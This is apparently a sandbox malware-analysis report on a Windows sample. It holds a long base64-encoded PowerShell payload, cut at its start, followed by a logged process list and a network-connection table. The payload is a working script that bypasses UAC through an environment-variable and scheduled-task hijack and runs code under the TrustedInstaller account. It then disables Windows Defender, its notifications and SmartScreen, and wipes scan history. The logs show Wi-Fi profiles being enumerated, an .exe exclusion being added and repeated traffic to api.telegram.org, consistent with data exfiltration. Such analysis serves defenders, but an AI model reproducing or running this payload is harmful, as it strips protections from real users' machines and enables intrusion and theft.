QAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmAHIAbwBtACAAVQBBAEMAIABlAHgAcABsAG8AaQB0AHMAJwArACQAcgArACcAIAAgACAAIABgAGAAYAAnACsAJAByACsAWwBjAGgAYQByAF0AMwA5AA0ACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcADQAKACQAcwBjAHIAaQBwAHQAKwA9ACcAOwBpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkAfQAnADsAIAAkAGMAbQBkAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsACAAJwArACQAcwBjAHIAaQBwAHQADQAKAA0ACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewANAAoAIAAgAHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawANAAoAfQANAAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsADQAKACAAIABpAGYAIAAoACQAZgBsAGEAdwAuAEEAYwB0AGkAbwBuAHMALgBJAHQAZQBtACgAMQApAC4AUABhAHQAaAAgAC0AaQBuAG8AdABsAGkAawBlACAAJwAqAHcAaQBuAGQAaQByACoAJwApAHsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQA7ACAAYgByAGUAYQBrAH0ADQAKACAAIABzAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgACQAKAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAnACsAJABzAGMAcgBpAHAAdAArACcAIAAjACcAKQANAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ADQAKACAAIABpAGYAKABnAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAApAHsAcgBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAOwBzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxAH0AOwBiAHIAZQBhAGsADQAKAH0ADQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AA0ACgAgACAAJABBAD0AWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMAQQBzAHMAZQBtAGIAbAB5ACIAKAAxACwAMQApAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMATQBvAGQAdQBsAGUAIgAoADEAKQA7ACQARAA9AEAAKAApADsAMAAuAC4ANQB8ACUAewAkAEQAKwA9ACQAQQAuACIARABlAGYAYABpAG4AZQBUAHkAcABlACIAKAAnAEEAJwArACQAXwAsAA0ACgAgACAAMQAxADcAOQA5ADEAMwAsAFsAVgBhAGwAdQBlAFQAeQBwAGUAXQApAH0AIAA7ADQALAA1AHwAJQB7ACQARAArAD0AJABEAFsAJABfAF0ALgAiAE0AYQBrAGAAZQBCAHkAUgBlAGYAVAB5AHAAZQAiACgAKQB9ACAAOwAkAEkAPQBbAEkAbgB0ADMAMgBdADsAJABKAD0AIgBJAG4AdABgAFAAdAByACIAOwAkAFAAPQAkAEkALgBtAG8AZAB1AGwAZQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4AJABKACIAKQA7ACAAJABGAD0AQAAoADAAKQANAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQANAAoAIAAgACQAUwA9AFsAUwB0AHIAaQBuAGcAXQA7ACAAJAA5AD0AJABEAFsAMABdAC4AIgBEAGUAZgBgAGkAbgBlAFAASQBuAHYAbwBrAGUATQBlAHQAaABvAGQAIgAoACcAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAnACwAIgBrAGUAcgBuAGUAbABgADMAMgAiACwAOAAyADEANAAsADEALAAkAEkALABAACgAJABTACwAJABTACwAJABJACwAJABJACwAJABJACwAJABJACwAJABJACwAJABTACwAJABEAFsANgBdACwAJABEAFsANwBdACkALAAxACwANAApAA0ACgAgACAAMQAuAC4ANQB8ACUAewAkAGsAPQAkAF8AOwAkAG4APQAxADsAJABGAFsAJABfAF0AfAAlAHsAJAA5AD0AJABEAFsAJABrAF0ALgAiAEQAZQBmAGAAaQBuAGUARgBpAGUAbABkACIAKAAnAGYAJwArACQAbgArACsALAAkAF8ALAA2ACkAfQB9ADsAJABUAD0AQAAoACkAOwAwAC4ALgA1AHwAJQB7ACQAVAArAD0AJABEAFsAJABfAF0ALgAiAEMAcgBgAGUAYQB0AGUAVAB5AHAAZQAiACgAKQA7ACQAWgA9AFsAdQBpAG4AdABwAHQAcgBdADoAOgBzAGkAegBlAA0ACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AA0ACgAgACAAJABXAFAAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAVwByAGkAdABlACQASgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABKACwAJABKACkAKQA7ACAAJABIAEcAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAQQBsAGwAbwBjAEgAYABHAGwAbwBiAGEAbAAiACwAWwB0AHkAcABlAFsAXQBdACcAaQBuAHQAMwAyACcAKQA7ACAAJAB2AD0AJABIAEcALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAWgApAA0ACgAgACAAJwBUAHIAdQBzAHQAZQBkAEkAbgBzAHQAYQBsAGwAZQByACcALAAnAGwAcwBhAHMAcwAnAHwAJQB7AGkAZgAoACEAJABwAG4AKQB7AG4AZQB0ADEAIABzAHQAYQByAHQAIAAkAF8AIAAyAD4AJgAxACAAPgAkAG4AdQBsAGwAOwAkAHAAbgA9AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABQAHIAbwBjAGUAcwBzAGUAcwBCAHkATgBhAG0AZQAoACQAXwApAFsAMABdADsAfQB9AA0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQANAAoAIAAgACQAVAAyAC4AZgAyAD0AMQA7ACQAVAAyAC4AZgAzAD0AMQA7ACQAVAAyAC4AZgA0AD0AMQA7ACQAVAAyAC4AZgA2AD0AJABUADEAOwAkAFQAMwAuAGYAMQA9ACQAUwBaAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFQAWwA0AF0AKQA7ACQAVAA0AC4AZgAxAD0AJABUADMAOwAkAFQANAAuAGYAMgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsAMgBdACkAKQANAAoAIAAgACQASAAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAIgBTAHQAcgB1AGMAdAB1AHIAZQBUAG8AYABQAHQAcgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABEAFsAMgBdACwAJABKACwAJwBiAG8AbwBsAGUAYQBuACcAKQApAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALABAACgAKAAkAFQAMgAtAGEAcwAgACQARABbADIAXQApACwAJABUADQALgBmADIALAAkAGYAYQBsAHMAZQApACkAOwAkAHcAaQBuAGQAbwB3AD0AMAB4ADAARQAwADgAMAA2ADAAMAANAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawANAAoAfQANAAoADQAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAA0ACgAnACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcALAAnAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACwAJwBcAE0AcABFAG4AZwBpAG4AZQAnACwAJwBcAFMAcAB5AG4AZQB0ACcALAAnAFwAUgBlAGEAbAAtAFQAaQBtAGUAIABQAHIAbwB0AGUAYwB0AGkAbwBuACcAIAB8ACUAIAB7AG4AaQAgACgAJAB3AGQAcAArACQAXwApAC0AZQBhACAAMAB8AG8AdQB0AC0AbgB1AGwAbAB9AA0ACgANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACAATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AXwBTAHUAcABwAHIAZQBzAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcAIABEAGkAcwBhAGIAbABlAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtACcAIABFAG4AYQBiAGwAZQBTAG0AYQByAHQAUwBjAHIAZQBlAG4AIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACcAIABEAGkAcwBhAGIAbABlAEEAbgB0AGkAUwBwAHkAdwBhAHIAZQAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBuAGUAdAAxACAAcwB0AG8AcAAgAHcAaQBuAGQAZQBmAGUAbgBkAA0ACgBzAGMALgBlAHgAZQAgAGMAbwBuAGYAaQBnACAAdwBpAG4AZABlAGYAZQBuAGQAIABkAGUAcABlAG4AZAA9ACAAUgBwAGMAUwBzAC0AVABPAEcARwBMAEUADQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwB0AGEAcgB0ACAAKAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKwAnAFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAE0AcABDAG0AZABSAHUAbgAuAGUAeABlACcAKQAgAC0AQQByAGcAIAAnAC0ARABpAHMAYQBiAGwAZQBTAGUAcgB2AGkAYwBlACcAIAAtAHcAaQBuACAAMQANAAoAZABlAGwAIAAoACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKwAnAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAUwBjAGEAbgBzAFwAbQBwAGUAbgBnAGkAbgBlAGQAYgAuAGQAYgAnACkAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAgACAAIAAgACAAIAAgACAAIAAgACAAIwAjACAAQwBvAG0AbQBlAG4AdABlAGQAIAA9ACAAawBlAGUAcAAgAHMAYwBhAG4AIABoAGkAcwB0AG8AcgB5AA0ACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAJwBAACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZQB4ACgAKABnAHAAIABSAGUAZwBpAHMAdAByAHkAOgA6AEgASwBFAFkAXwBVAHMAZQByAHMAXABTAC0AMQAtADUALQAyADEAKgBcAFYAbwBsAGEAdABpAGwAZQAqACAAVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACAALQBlAGEAIAAwACkAWwAwAF0ALgBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAKQANAAoAIwAtAF8ALQAjAA==
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
C:\Windows\system32\whoami.exe
"C:\Windows\system32\whoami.exe" /groups
C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" qc windefend
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
C:\Windows\system32\net1.exe
"C:\Windows\system32\net1.exe" start TrustedInstaller
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
C:\Windows\system32\whoami.exe
"C:\Windows\system32\whoami.exe" /groups
C:\Windows\system32\net1.exe
"C:\Windows\system32\net1.exe" start TrustedInstaller
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" qc windefend
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" qc windefend
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
C:\Windows\system32\whoami.exe
"C:\Windows\system32\whoami.exe" /groups
C:\Windows\system32\whoami.exe
"C:\Windows\system32\whoami.exe" /groups
C:\Windows\system32\net1.exe
"C:\Windows\system32\net1.exe" stop windefend
C:\Windows\system32\net1.exe
"C:\Windows\system32\net1.exe" stop windefend
C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\findstr.exe
findstr All
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\netsh.exe
netsh wlan show networks mode=bssid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add - MpPreference - ExclusionExtension ".exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\findstr.exe
findstr All
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\netsh.exe
netsh wlan show networks mode=bssid
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api64.ipify.org | udp |
| US | 64.185.227.155:443 | api64.ipify.org | tcp |
| US | 8.8.8.8:53 | 155.227.185.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.99:443 | www.bing.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 99.61.62.23.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 23.62.61.99:443 | www.bing.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 66.235.168.242:4449 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 66.235.168.242:3232 | tcp | |
| US | 8.8.8.8:53 | 242.168.235.66.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
